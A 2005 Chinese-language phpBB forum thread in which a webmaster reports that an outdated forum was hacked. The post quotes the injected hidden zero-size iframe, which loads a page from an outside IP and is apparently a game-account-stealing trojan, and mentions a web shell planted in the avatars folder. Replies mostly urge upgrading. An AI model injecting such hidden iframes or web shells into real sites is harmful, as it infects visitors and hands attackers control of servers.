[被駭]又被駭了!

Webmasters Discussion
站長們到此分享架站甘苦、管理心得等;歡迎大家多多提出意見喔!
(請勿發表任何跟站長經驗分享不相干的文章,違者砍文)

版主: 版主管理群

頭像
jawa560
星球公民
星球公民

[被駭]又被駭了!

文章 jawa560 »

版本phpBB2.06
侵入方式:
修改版面分區內容,植入\r

代碼: 選擇全部

<iframe src="http://210.51.23.7/help.htm" name="zhu" width="0" height="0" frameborder="0"></iframe>
應該是盜取天堂資料的木馬,真是可惡,看來不升級是不行了!

攔截畫面如下:
圖檔
最後由 jawa560 於 2005-03-20 03:03 編輯,總共編輯了 1 次。
頭像
jawa560
星球公民
星球公民

剛剛又發現大頭照的資料夾裡(images/avatars),發現了一隻木馬程式
._admin.php

XD,竟是一隻類似telnet的程式,原名應該叫myshell, 帳號密碼對了,就可以直接對主機下系統指令! 大家趕快查一查!
圖檔
最後由 jawa560 於 2005-03-20 03:02 編輯,總共編輯了 3 次。
頭像
jawa560
星球公民
星球公民

恭請站長是否可新增一個駭客通報區,這樣大家才能即時防護自己的系統!
design
竹貓忠實會員
竹貓忠實會員
聯繫:

Re: [被駭]又被駭了!

文章 design »

jawa560 寫:版本phpBB2.06
連安全性升級都不在乎的

新增駭客通報區有用嗎 :-)
頭像
jawa560
星球公民
星球公民

樓上的大哥,很多人並不是有那麼多時間可以專心在維護論壇的,而且別人加了多少外掛而導致升級困難的狀況,也不一而足,所以這樣講並不太公平!
aHfUi
星球公民
星球公民
聯繫:

文章 aHfUi »

那么你要花1点点时间来升级
还是一直给人家HACK @@?
頭像
jawa560
星球公民
星球公民

有沒有空升級,或升級有沒有困難是一回事,駭客事件有沒有收集的價值是另一回事。不過,還是很感謝大家的意見!
kororinfo
星球普通子民
星球普通子民

文章 kororinfo »

有沒有通報.到最後還是要升級吧
黑風凱特
星球公民
星球公民
聯繫:

文章 黑風凱特 »

不升級安全性更新...

你的站台剛好可以給新手hacker練習用....

快快更新吧....

要不了多少時間的~
圖檔
Mac
百戰天龍馬蓋先
百戰天龍馬蓋先
聯繫:

文章 Mac »

jawa560 寫:樓上的大哥,很多人並不是有那麼多時間可以專心在維護論壇的,而且別人加了多少外掛而導致升級困難的狀況,也不一而足,所以這樣講並不太公平!
你的邏輯有問題吧?既然沒空維護論壇,那被駭了要怪誰呢?
既然都已經有『公告區』要大家升級 phpBB 都沒用了,你認為『駭客通報區』的成效有多少?

~Mac
+ 關於 phpBB 使用問題請在版面發問,私人訊息提供其他不相干或是隱私的事情聯絡之用。

phpBB 官網 | 竹貓星球 | MacphpBBMOD | 我的服務
頭像
jawa560
星球公民
星球公民

對不起,混亂大家的思考了!
我要說的是,被駭是我家的事,我自會解決. 但我希望有駭客事件通報區.
政府雖然可發公報,但五花八門的新聞播報仍然有其收視率!
最後由 jawa560 於 2005-03-20 14:37 編輯,總共編輯了 1 次。
頭像
godbless
竹貓忠實會員
竹貓忠實會員
聯繫:

文章 godbless »

jawa560 寫:那意思就是說,只要政府有發公報,五花八門的新聞播報就沒價值了?
有宣傳價值...

其實有很多時候都是媒體先發播報,然後政府才發公報的...
外掛問題區發問格式就在這裡,請務必一定照著格式來~!
你不照著規則來,就算是也搞不清楚你的問題在哪裡!
新手問問題不是罪惡
罪惡的是自己沒有先做好本分和功課,說話的口氣也不好,再加上態度有好像我們這群人欠你多少似的~~!!
竹貓星球發問規則:
http://phpbb-tw.net/phpbb/viewtopic.php?t=16149
發問比率最高的句子翻譯:
Please ensure both the install/ and contrib/ directories are deleted
請確認install和contrib資料夾已被刪除(奇怪,翻一下英漢字典有這麼困難嗎)
design
竹貓忠實會員
竹貓忠實會員
聯繫:

文章 design »

有安全性更新通知的時候就是有用戶被駭的時後,
這樣還需要什麼駭客通報區?

就拿 phpbb 2.12 來說吧.
http://www.nsfocus.net/index.php?act=se ... ug_id=7464

到處都可以取得C的原始碼或有心人編譯過的工具\r
被駭的情況都一模一樣.

況且竹貓在這個漏洞出來也發了會員通知信
這樣還被駭, 然後再來通報, 不覺得問題是出在自己身上嗎?
haw
星球公民
星球公民

文章 haw »

自己不做好論壇的維護
有在多的通報\r
你也只能知道自己即將被哪種木馬hack罷了

升級也不過花個十幾二十分鐘
我想絕對比你去查,去解,去知道那些hack跟木馬還快吧?

思考方向偏差真的頗大喔!
頭像
oscerropper
星球公民
星球公民

文章 oscerropper »

更新是為自己的論壇系統安全,等你被駭後就得不嘗失,我相信你的作業系統也會定期更新吧
●架設主機作業系統:Unix
●您的上網方式:虛擬主機。
●您安裝的程式:
Apache version 2.0.63
MySQL version 45.0.92-community
PHP version 5.2.14
Perl version 5.8.8
●您的 phpBB2 版本:phpBB 3.0.8。
回覆文章

回到「站長交流」